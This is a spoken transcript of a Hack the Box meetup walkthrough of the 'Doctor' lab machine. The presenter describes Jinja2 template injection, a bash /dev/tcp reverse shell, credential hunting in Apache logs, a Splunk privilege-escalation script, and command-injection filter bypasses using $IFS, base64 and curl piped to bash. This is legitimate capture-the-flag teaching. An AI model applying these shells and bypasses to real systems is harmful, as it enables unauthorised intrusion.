everyone. Welcome to the Hack the Box Tampa Meetup. My name is Laz Slayer, and we have Nevin and GERBSEC with us today. Nevin, do you want to introduce yourself?
Sure, my name's Devin. I go by the handle Slangin. I'm Savannah's co-host, and we're excited to have GERBSEC here going over Doctor. GERBSEC, if you want to introduce yourself real quick.
Yep. Yeah, my name's GERBSEC. Most people know me by Wasim, my first name. I'm a CTF player, hacker, and today I'm presenting Doctor.
Sweet. So anyone who provided their emails, I invited them to the server. You're welcome to either use a dedicated server or if you have like a VIP membership, that's fine as well. But as of right now, I think that we're ready to go because we've invited everyone that did send over their information. So I'll go ahead and remove Nevin and I. You can go and get started.
Yep. All right, everybody. So today we're doing Doctor. It's an easy machine on Hack the Box. I kind of wanted to do this pretty much almost blind. So I've done this a while back, and I haven't done it in a while. Kind of reviewed my notes, but that's pretty much it. We're gonna go ahead and we'll do what we'll do with any time. We'll start a machine, and we're gonna go ahead and start with an Nmap scan. So I have an Nmap scan that I do pretty much every time, and it looks something like this. Now that last part I add because I have ADHD and I really can't wait for the Nmap scan to go through. But if this was a real pen test, I would never do that. So maybe I should make that clear. So what this does is you'll have the Nmap scan, and then you'll have the script scan. So the default scripts, when it finds a specific port that is open and it's sure that it's SSH, for example, it'll run SSH scripts against that specific service. Then you have the version scan, so it'll figure out the version of the SSH and whatnot, and whatever other service it finds. And then I'm going to save that output to an nmap file called nmap.out, and then I'll give it some verbosity with a -v. I'll do all ports with -p- IP address, and then this last little bit at the end just makes it go really fast. So I'm going to go ahead and hit enter my password, and we'll let it go. And right away, I can see that port 80 is open. So I'm going to go ahead and access that IP address on port 80. And I like to have a little mixture here between my terminal and my browser, because I often use FUF and other fuzzing tools on the same side. And I kind of want to see the output while I play around with it because the scan is sometimes too slow. So here I see that this might be breaking some things. I see a broken image up here, and I wonder if there's a reason for that. Sometimes that might be because it is trying to get the picture from a domain, like we see right here, that I have to add to my Etsy hosts file. But looking down here, I'm going to kind of try to use the website how it's meant to be used. So I see there's different departments over here. There's a get started button that takes me nowhere. Looking over here, there's a call button. Again, takes me nowhere. I'm looking at the bottom left of the screen. There's the pound at the end, which means it does nothing. There is a domain, doctors.htb. So I'm going to need to add that elite Main Street. Again, these are doing nothing. All these are not buttons. Nothing here. Some names that might be usernames that I might need to look at later on. You can use something like you can use what's the tool called? It's like a username and password generator with this. I completely making out the name, but that could be something that I can figure out if needed. Lorem ipsum. Admin user, admin, comments, etc. And if I click on it, there's nothing. So this all looks default, but I do see an email form here, so I can try to test at test.com, and clicking it doesn't look like it's doing anything. I'll turn on my burp suite. Yep, clicking it does absolutely nothing. All these take us nowhere. So I kind of try to go through that one pretty thoroughly. It might get a little boring, but you really don't want to miss like a small detail when it comes to these. So looking back at our Nmap scan, I see we have SSH, port 80. I see we got Splunk. That's pretty interesting. So we have Splunk, SSH, and port 80. If I take a look at the Splunk instance right now, was it 80, 89? Turn off my burp real quick. Okay, we can see here that we are using Splunk. So to log in, I can probably just look up Splunk default credentials. Oh. Then admin and password change me, it looks like might work. So let's go ahead and do that real quick. Accept the cert. Admin change me. Just in case I misspelled that. Change me. So that doesn't look like it's working. Credentials are probably changed, and I see 805. But what I'm going to do now is I'm just keep that in the back of my head. Just kind of remember that I have a Splunk instance on a version 8, and I'm going to follow the first lead I found, which is this domain. So I'm going to go to my Etsy hosts, and I'm going to add IP address, tab, doctors, HTTP. And what this does is it'll create pretty much a fake DNS query in my own machine. So when I route to doctors.htb, it'll actually take me to a new page. Okay, cool. So, and it'll route to the IP address. But since I'm using the domain, they have some logic in the backend that routes me to this server instead. So it looks like here we have a doctor message secure messaging system with a login page, a registering page, a home page, which is the login page, but it doesn't have this. And then a forgot password. Okay, cool. So we can try admin at doctors.htb test. We try admin here as well. Nothing's working. I can try to do admin at doctors.htb. It says no account with that email. You must register first. I can try administrator. Again, nothing. So at this point, I can pull up FUF and I can try to find a valid username. And I can try to brute force that username, but that's not the most efficient way to do things. So I will not do that. I'm going to go see if I can indeed register. So GERBSEC at test.com. Password is password, and sign up. I was able to sign up. So GERBSEC at test.com and password. So that looks good. I like to take a look at my cookie, which looks like a JWT token. I'll keep that in mind as well. I don't want to mess around with the JWT token just yet. I'd rather not, in fact, mess around with the JWT token as of right now. So I'm going to go ahead and look at my account. And at this point, I would like to send everything through Burp. Main reason being, I'd like to see if there's any weird requests happening when I click, for example, GERBSEC at gerbsec.com. Here, what does that look like on their end? There's a CSRF token that's being implemented. There's my username, my email, and then it's update. For some reason, it's using a multi-part form data, but even then, that's not very insecure particularly, so there's no point in even looking at that. The next thing I can see here is we have the new message page. So I'm going to try to do like test, and here I want to see what that looks like. So it creates the message, and then at this point I can look at the source code possibly. And I can try to, ooh, what happened? Okay, GERBSEC, at GERBSEC. I think maybe changing my email might have, I didn't like that. Test, password. Okay, we'll do test at test.com, test. Easiest way to do things. All right, cool. I have a time limit of 20 minutes. For some reason, the other account got kicked. I'll go ahead and I'll try to do some cross-site scripting attacks. And I'll go ahead and copy that. Nothing here. I'll try to do something a little bit more, I guess, difficult to defend against. If you're not doing it properly, that is. There you go. Nope. Yes, there you go. And that doesn't work either. I want to check the source code here to see if that's being written, and it is being protected against properly. And I'm seeing right here that it says there's a comment. There's a comment that says archive still under beta testing, and then it has /archive. So that's pretty interesting. I'm going to duplicate this page and go to that endpoint. That looks like an empty page. But if I look at the source code, it is not an empty page. And there is a title. So here I'm going to capture that request of submitting this and see if it's taking it to the archive. So let me see what that looks like. So post. I'm going to take that to repeater. Send. Nothing happened here. If I do something like this, it's a redirect, and I'm noticing something here. It's a Python server, and I wonder if my nmap actually said that. It did not. So it's Apache, but it's Python that is returning this data back to me, or responding to my requests on this end. So I wonder if we can do something like this. So what I'm doing right now is an SSTI injection, and that is probably best explained by payload all the things. SSTI server side template injection. And make sure I turn off my burp. So payload all the things, for the people that don't know, is a website filled with payloads for different things, all the things. And here I'm specifically looking at server-side template injection, and this is kind of just from experience. When I see Python and templating like applications like Jinja, for example, specifically Jinja 2, and other languages like Java and Ruby and PHP all have templating languages, and all of these could be vulnerable to injections if people are not aware or are not looking out for them. So there is a chart by Pen Testing SSTI, and there is a chart that I really like to look at to kind of understand what type of SSTI we're looking at here. So, and it's this one. So it starts off with, there you go. Can I make it any bigger? No. All right, no problem. So it starts off with a $7 × 7, and then from there, if it works, then we go up there. If it doesn't work, we'll try this one. So let's start with that. So $7 × 7, and we'll go ahead and post it in both. And I'm not getting anything here. Let's see if I'm getting anything here. So that did not work. So what I can try next is the 7 × 7 and curly brackets like that. So another one, 7 × 7. And if this does get evaluated, this should turn out to be 49. So again, nothing down here. And there it is. So we're getting 49. So we found the vulnerability. Hopefully. This might be a rabbit hole. Hack the Box does like rabbit holes. From here, what I like to do is I'll go to payload all the things. Or is there a little bit more? Right. So I should try this with the quote, because it might be Jinja or it might be Twig, and that's important to be sure that I'm doing that right. So it'll be 7 times and then quote 7. So if I recall correctly, if this evaluates 49, it's Twig. If it shows me 7 sevens, then it is Jinja 2. So 7 sevens, Jinja 2. Perfect. It just happens to be the easiest one to exploit. And we can start by looking at remote code execution. Should be somewhere here. I went right past it. Yep. So we can try something like that, or even a smaller one. But I'll go ahead and start with this big one, just to see if it'll work. And it looks like just the title is being written over here, so there's no point in putting anything down here unless it makes me. Yeah. So I'll go ahead and send that. So that should be the ID command, and there you go. Okay. So we got our CE. So at this point, I would like a reverse shell. So I'll go ahead and put all my commands in here. What I'll start is with a bash reverse shell. I'll do a bash-c bash-i greater than ampersand /dev/tcp, then my IP address, and that is my hack the box IP address for my OpenVPN connection. IP, I like to do a common port like 443, and then at this point I can go ahead and do that. And then to make sure my connection doesn't die, I'll do something like that. So if everything is correct, we should get a shell. We should get a shell. Okay, there it is. And this also sets up a I should be able to just refresh this page if my shell ever dies. And now that I'm in, what I'm gonna do is I'm gonna fix my shell. I like to do that because otherwise I don't see colors. I can't clear the screen. So I'll use this Python shell fixer. I don't know exactly what you would call this. And I also exported term to screen, and screen is what Tmux uses, but a lot of people use xterm or whatever. And that allows me to clear the screen. So we are in the web users home directory, it looks like. And our next goal is privilege escalation. So we got our first shell, and our next goal is privilege escalation. I already see a couple of things that are pretty interesting here, and I'm going to start with this blog.sh. It's a blog file that has a secret key for the SQLite, or I guess the SQL Alchemy SQLite database. It looks like that's how the Python 3 app is being run, and that's this. So I can look at that code here. Nothing too interesting, and the rest is in here, obviously. And you have main config. I could read config.py, and I can see the user, mail user, I guess, a mail password. And if there's anything else I can find here, there's a database. There's database file. So SQLite 3 site.db.dump. We don't have that. So what's the easiest way to get that somewhere? We can use netcat. So I can do cat site.db netcat. Oh, you know what? That's not going to be a good idea because my shell is going to die. Do we want to suffer? Is that worth it? So the reason I'm trying to take this over to my machine is so I can try to decrypt it. Possibly there might be a password. So this looks like it's still alive. I wonder, can I access static? slash. Oh, that's not how Python works, is it? ls/var www HTML. So maybe I can move site.db to /var www, or at least copy it so it doesn't break the server. Copy /var www HTML. There. Oh, site.db. And what this will do is I'll be able to access the IP address. Hopefully to /site.db. And there you go. Okay, that worked. Not the best solution, but it worked. So do I have SQLite 3 here? I do. Exit. Quit. That's fine. And then, oh no, that's not what I want. This is what I want. Control Z. There you go. SQLite 3, and then site.db.dump. So that dumps the database, and you can see that's our shell in one of the, or our last command is putting that in the database. We can scroll up here and we can see the username admin@doctor.htb. So it was doctor, not doctors, like the domain was. And we see a password, and that looks like bcrypt. And I don't want to crack a bcrypt in a VM. So what I'll do is I'll try to do a reverse hash lookup. And that looks like it came up. Processing. It looks like it's processing an MD5 hash, not my hash. So that doesn't look right. And that is a walkthrough that we don't want to look at right now. So I'm going to not look at that. Bcrypts are very hard to crack and generally pretty secure. Okay. So from that point on, then what I'm going to do is I'm going to follow the second lead that I saw right away, that being my ID. So I see that I'm the ADM user, and that tells me a lot. And before I go down the path, let me see if doctor works here. What else do we have? Doctors. Okay, cool. So I'm not going down the wrong path. If I didn't have any leads, I would throw linps at this. But because I can see ADM is clearly running over here, which for the people that don't know, gives me read-write access, or I don't know about write, but read access to the log files. So if I go in here, you'll see that, you'll see that a lot of these are owned by root and ADM. So this doesn't look very good. There you go. Or syslog and ADM. Sometimes it's root and ADM. And the ADM user has read access on a lot of these files, and otherwise, or ADM group rather. And I'm in that group, so I should be able to read things. So thinking about this, I would want to read the auth.log. See if there's, for some reason, any misconfigurations in the way they're doing logging. And I can see someone SSHing in, I can see their password. Doesn't look like it here. I can try to read the other one. And again, it should stand out pretty fast if there's anything wrong with this. The next thing I know is that we have Apache 2. So maybe I can read the access.log. That's a lot harder to look at. So cat access.log and grep for a login. So we see a login. So let's do that again. And I'll grep for a user. That did not give me what I want. So these login attempts, I guess you can say, don't really seem, they only seem like they have login ?next. They don't really have anything in them. It's nothing's in a GET request here. or even a post request at that. So we have another one, I think, access.log.1. And knowing Hack the Box, they wouldn't give me this like privilege if there wasn't something to look for. Pass. Oh, cat access.log.1 grab pass. Cat error. Here, let me see. What am I missing here? Oh, backup. So backup is not a common file that you'd find here. You'd find access.log, you'd find this, you'd find these gunzipped access.log, and you'll find a bunch of error.logs, such as this. But you won't just find a file called backup. And I don't know how I missed that right away, but I did. So let's go ahead and read this file. And again, it's too much to just glance at. So let's grep user, cat backup, grep pass, and there it is. Cool. So it's a reset password. That's what we're looking for here. It's a reset password endpoint. And I wonder where that is. So cat backup, grep pass dash a. Let me give you a number, 5. So it's the reset password for doctor, and we get a password. The other thing I noticed about our ID, so let me try to do sudo -l first of all. That does not work. Just gonna get it to move along. The other thing I noticed about our IDs is we're 1001. That means there's a user other than us, because usually the first common user in Linux is 1000. So we see a user called Sean here, and we remember from my nmap output that we have sh. So I'll try to sh as Sean at doctors.htb. I'll put his password in. That does not work. Do I have the right password? Is there a space involved in this? I don't think so. Can I su to Sean? I can. Okay, that's interesting. Maybe we'll look later at why I can't sh it to Sean, but I can switch user into him. But at this point, we can see that we have the flag. User flag. So maybe at this point I can sudo -l. Of course, it's not gonna be that easy. What else can we do here? So we can check out Splunk. That is a service we haven't looked at yet. We also see that there's a hidden process or hidden something running on port 5000. I can imagine this is something to do with our Python server. Now I wonder where Splunk is installed. There it is. And I wonder how to figure out credentials. I wonder if we can log in with any of the credentials we have so far, like doctor, or Sean and guitar. So let's do that. And then port 80, 89. HTTPS. So where was the login? Okay. Doctor, Sean, guitar. Cool. Okay, we're in. Is that admin? Okay, that is admin. Cool. So we have a login, and I wonder if we can do something with that. Splunk 8.0.5 exploit. There's an exploit DB link. Splunk forwarders, and Splunk whisper. Local privilege escalation. That already catches my eye. It's a local privilege escalation or remote code execution through Splunk's universal forwarder. You have a local shell on a Windows computer. It's Windows only. We can do remote. It's a privilege escalation and so this is their C# version and this is their Python version. Oh, okay, I see. So they have the local one, and it'll connect locally, it looks like. And then we'll do the remote one, because I don't know what type of credentials we have. So I'm going to go ahead and go to my machine. Get this Python file, -o, we'll call it x.py for exploit. And I'll look at that. So looking at that, what are the arguments it's looking for here? Let's look for main. No main. So it's running everything at the end here. Okay. All right, this doesn't look that bad. Let's give it a try. Okay, -- scheme, and then a host, a port, an L host. Which one's required? A host and an L host. So let's give it a host to look at. So https doctors.htb, then a port, which is 8089, an L host, which is me. So what am I again? 10 10 14 10 10 14 47, and L port. Yeah, again, I'll do something like 443. We need a username, so that's Sean. A password, so that's not that. I'll have to sit through it, fortunately. Guitar 1 2 3, and then for the payload, I'll do, who am I? We'll see. It's authenticating. It's having trouble authenticating. Oh, did I not need number service unknown? Let's go to an IP to skip that problem, possibly. I think the scheme part is the HTTPS part, I think, maybe. And host is just the IP that it's expecting to attack. I can check that here. So yeah, let's do that. So let's just give the IP here, and then do -- scheme HTTPS. Oh, there you go. That didn't return anything. Maybe there's no output. So let's do a bash reverse shell. --c --i dev tcp 10 10 14 47 443, and keep it alive. So at this point, if everything is correct, oh, it'll do it for me. Sick. So at this point, if everything is correct, bash cannot set terminal process group ioctl bash ic bash si. So let's just do 80 here. I'm not sure. Oh, I see. This is for the payload that it's creating. It's creating a mini server to send over. So let's do a netcache NVLP on 80 and see if we can get it on 80. Yep. Okay. Cool. And here we have it. I've rooted the box. So I don't know how much time we have left. I don't know if I did that too fast. But what we can do is I have a couple ideas that we can go through if you guys are interested. That is.
Yeah, we could. You can definitely run through anything else that you wanted. We still have like plenty of time. So
okay, cool. Yeah, because there's an unintended exploit that I found and a bunch of other people found that I think would be pretty fun cracking at it. So let's go do that.
Okay, cool. I'll remove Nana and I.
if I go back to doctors.htb, and don't think should be broken at this point, right? But I need to do this. IP address, that's good. Doctors, might reset it just for fun, just to get it to work. Yeah. So the exploit that we found, we could have looked at it while we have a shell, but I think it's more fun if we do it blind, is a command injection. And I don't think it's intended because the obvious way is to do it through SSTI. And in fact, I'm pretty sure some other people found it. It's not just me. It's command injection through pretty much, it's almost impossible to find, but when you throw a fuzzer at anything, it'll find something. And that's how I found it. The message content. And I'll show you what I mean as soon as this is up. I'll need to edit my Etsy hosts file because I'll likely get a new IP. And when I get that, essentially what it's doing is that in the message content, you can actually put an IP address or whatever, and it'll actually curl that IP address. But the problem with that is, I think it was meant to be a rabbit hole, but it's in a Python. I think it's like something like that in Python, and it's an F string. So let's go to Python 3. If I remember correctly, looking at the source code, it was like an F string, and then it's like curl URL, and then that, and it's not printing it. That's a variable that's being called by OS. And I can enter whatever I want here. AKA I have command execution if I know what I'm doing and it's not sanitized. So that's what we're gonna try to exploit here. Hopefully my machine resets today and then we get to do it. And I got unauthenticated for some reason. It's probably this. Okay. Cool. Got the IP. Is it the same one? Looks like it's the same one. So if I go to doctors.htb. All right, cool. So let's go ahead and full screen this for a little bit. Zoom out. And I will create an account because we're on a new session right now. Test at test.com, test and test. So the vulnerability lies over here. I'll show you guys what I mean. So if I set up a Python server, a very quick Python web server on port 80, and I get my IP address, I can do something like that. Or I need to give it a, something like this should work. Yeah. And you see, clearly it's getting my page. So, and we can actually intercept this request. Oops. Why is this not working? Okay. We can actually see the type of request it is by doing something like this. And this is how I remember figuring out it's curl, is because I got the response or the request headers here. And you can see the user agent is curl. So from something like that, I can assume I'm being curled here. So I can try to do something like this by giving it the URL and then giving it a who am I command, and then setting up the server and seeing if I can get a connection back. And you see here, I was able to get the web user, and we know it's the web user from earlier from getting it the intended way. So now how can we turn this into a shell? I can try reading a file. So I don't need to kill that ever. So I can try to read a file here by doing like cat/etc pass, and I'll copy that payload. In fact, to make our lives a lot easier, I'll capture this request. Oh, capture this request. Oh, the link you sent is not valid. Post. Yeah. Repeater. There's no CSRF token, right? Yeah. Peter, come over here. In this over here, I can do $8 who am I, just so we know that this is working. Perfect. So we can make this smaller. Is this big enough over here? Hopefully it is. And I'll try to do a cat/etc pass. So I should URL encode as I type /etc password. And when I send that in, it doesn't seem to work. And on this side, what does it say? Oh, it does say a link you posted is not valid. So it does doing some sort of checking on their end. It doesn't like the space or the length is too long. So I'm gonna be optimistic first and try to do like a longer command, like who am I colon if I know how to spell who am I colon ID, just to see what that looks like. Okay, so part of it worked. The second part, to be specific, the ID shows up over there. So it looks like it's a space that it doesn't like. And there's a lot of ways to bypass that. So we can try to do an IFS bypass. So I can try to do like $sign IFS, and I'll show you what I mean here. In Linux, I can do like who am I, and then like, or I guess like cat/etc password, and that'll work. But if I can't do a space, I can sometimes do $sign IFS. Might need to put quotes around here and around here, and might need to go to bash. ZSH is weird. IFS/etc password, and that works. Another way we can bypass that space restriction is if I do like who am I, or I can do command expansion using like etc password like that, and that also works. Proof. There's two of them. So we can try both of these. I'll need quotes around cat, it looks like. And I'll need quotes around etc pass WD. And that should work. That is not exactly working. What is it saying? It's not working? No, it did work. It just didn't return anything. Yeah. So I wonder if it's just that it's too much, because clearly here it's not liking that. So then what I can do is I can try to do something like a pipe to netcat. So maybe like that. And we can try that. So then it would be netcat, or I guess netcat $IFS, my IP address, which is not that. It's just this. IP, and then $IFS, and then my port, which is, let's do 80, or I guess 81. And then up here, I'll just do a netcat NVLP 81. We'll see what that does. And that works. Okay, cool. So instead of my regular web server, what I'm going to do is I'm going to copy this right here and see what that looks like over here. So use no spaces. I did use a pipe. That might give me an error. And it did. It doesn't like the pipe. What does it say? Invalid link. How do we URL encode a pipe? Is that possible? When in doubt, CyberChef. And I can turn this off. I'll bookmark it while I'm here. Pipe. URL and code. There you go. 7C. 7C. Did not like that either. Okay. So then the next thing I can try to do is maybe just a reverse shell right away. Or I guess let me see if this isn't working, what would work? We can copy stuff to var www html. If that works, then everything should work. So copy $ifs /etc password. Close that. $ifs that /var www html password. So yeah, I don't need an output there. Oh, it didn't like that either. What is breaking this? Is it the length? This should work. That is. Let's do a sanity check. Let's do that. Okay. Okay. So then copy $ifs /etc pass, and then $ifs /var www html. Yeah. So that did get it. And if I go to this IP /password, perfect. Okay. So my IFS bypass is actually indeed working. That's really nice to see. So at this point, I can try to get a shell like that with my very trusty bash reverse shell. So netcat-nvlp 443. And we can try to do all of this. No, so bash $ifs -c and then $ifs bash $ifs -i ifs, and then this is going to get confusing. This, then that's greater than ampersand ifs -dev tcp IP, which is 10, 10, 14, 47, 443, $ifs, and then what am I looking at here? After that, it's 0 greater than ampersand 1, close. And close quote. Do I need a close quote? I might not need this --c. I'm going to start off without it, because that might break things. So I'm going to go ahead and start with this. And it did not like the link, so something here is broken. That is right. That is right. So a certain character here it doesn't like, and I can suspect it's probably the ampersand. So we can try a base64 encrypted shell and then just pipe it to bash. I think that's probably my easiest choice here. So I can do echo dash n bash dash c bash dash I dev tcp 10 10 14 47, just because I like being sure. Oh. 3. I'm gonna do base 64. What am I missing? Oh. what I add is a real question. So just to all I have to do is echo this, like not like that whatsoever. Echo this to base 64-D to bash, and connection refused. Okay. Fingers crossed on this one. Echo IFS this, and might need to was it %3? Oops, %3D on this one. That one $IFS pipe, which was %7C. $IFS. What is yeah, there you go. And then finally we'll need a bash, base 64. Oops. Base 64 $IFS. Yeah, the $, you're gonna hate $IFS from how much I'm repeating it at this point. And then pipe again, which was %7C space $IFS. I might need quotes around the 7C, we'll see. And then at this point, it's a quote and bash. That looks horrible, but if it gives me a shell, it gives me a shell. So we can try something like that. The next thing I'll do, if everything seems like it's broken, I'll take it over here. And I'll look at it quickly. So that looks right. This %3D might be fine for it to be an equal sign for now. This is a pipe. Might need to put this like that. All of that. Then instead of this, I'll do pipe like that. And am I in bash right now? I don't think I am. So what did that do? That echoed stuff out. But is it what I want it to echo stuff out? I think I want it to echo this stuff out, which is close enough, but not exactly what I'm looking for. Why is it not taking this in to bash? I think it might be these. Yep. So I don't need any of those quotes around that. I can come over here, paste this. That was a 302 found on the right. So all I need is a connection and a dream. So that just worked on my machine. And it's not complaining on their machine. But it's not working. Let me just double check that I really truly have the correct one. That is working. So this is the correct payload. Paste. Yeah, that should work. Any other ideas? This can go back to just being this. And then this can be %3D. Is it capital D? I can actually, to make things easier, I can just throw all of this in a URL encoder to help us. So let me do that very quickly. Go to all special characters. No, not all special characters. Cool. Oh, where are we? Last try. Submit. Oh, that's unfortunate when it works on your own machine, but it doesn't work. I'm getting a comment to try to do, instead of all these quotes, we can try to do curly brackets in here. So that could work, and it is a good idea, good enough for me to try. So let's do it. So no more quotes, curly brackets inside. Did I miss a quote? All the IFSs are wrapped. We can try to go ahead and try this. Oops. Oops. So let's go ahead and send out to 302, but nothing in return. Oh, last attempt, what I would try to do is write to a file. We can clearly do that. So if I can write to a file and then run the file, or wget or curl to bash, I think is probably our easiest way to do this. So last attempt, just for the fun of all of this, I'm going to keep this bash part at the end. And I'm just going to turn this first part into a curl. So it's going to be a curl $ifs, then my IP, so 10.10.14.47 / shell.sh $ifs. So unless I don't know what I'm doing, this should really work. And then to go alongside that, we'll create a shell.sh file /bin bash. Oh, am I doing this wrong? Whatever. We don't need that. /c /i dev tcp 10.10.14.47.443. And I'm only consistently using that like specific bash reverse shell because it's worked on multiple occasions in the intended way. So the idea here is if it's not broke, don't fix it. So hopefully that looks good. We'll try that here. That worked on my end. But that is not a surefire way to make sure everything works. So we can come over here. That is a lot of command. There's a lot less command. And hit send. No error. Is the server running? Server's running. Did it get that is the question. Now I wonder if I can utilize their curl. So something like this, utilizing their curl to shell.sh, and putting a space here, and then outputting that to a file, or piping that to bash. Yeah. No luck. Let's try. Yeah. I'm all out of ideas. Unless someone has any tips for me. The easiest way to probably do this is honestly just get the shell and read the source code. But this should be working on paper, but it's not, unfortunately. And I think this is a culprit, but it's not working out either way. So GG's.
Do you want to wrap it up here?
If you guys are cool with that, I mean, I that's the only thing I remember playing around with. That I would say would make this a medium level box. But other than that, it's pretty easy, pretty quick. The exploits are very well documented and discovered, so there's not much thinking on our end as pen testers. So
Yeah.
we get to play around with it.
Yeah, no, completely up to you, because I know we already went through the box and all the
Yeah.
like known like paths and everything, so we were kind of just messing around at this point. But if you want to
Yeah.
end it here, we're welcome to do that.
Yeah, we're cool.
So thank you so much for sorry, someone just sent a message, so I was trying to read as I'm talking. Square Zero, I don't know if you see his message of what he's trying to say.
I do. I'm gonna have to give that a try. I'm not a quitter, but I do hear the alarm, so I'll go quick on this one. Something like that. So that is your SSH key, but we'll see if that works. I'm gonna need the private key, man. We'll wait in the comments. See if I can get the private key. Let me send you the private key on YouTube comments. Maybe I should get my own private key on there while we wait. Sure, that's fine. Bird cat. Something like, what is this? Echo this. Ooh, that is not nice. What is the problem here? Oh, there's a space. Plus URL decode plus. Okay, let's see. Echo that into this. Send sh-i .sh IDRSA, and it's web at 1010. Or that's not right at all. Fortunately, it did not work.
Oh, dang.
I'm gonna have to give up.
It's okay. The machine will be up for like a few more hours, so everyone's like still welcome to try things and stuff as well on the dedicated server or on VIP. But yeah, we can wrap it up here. Thank you so much for presenting today. We really appreciate it, and we look forward to the next meetup.
Yep. Thank you, guys.
Bye, guys.
Bye.
Yeah.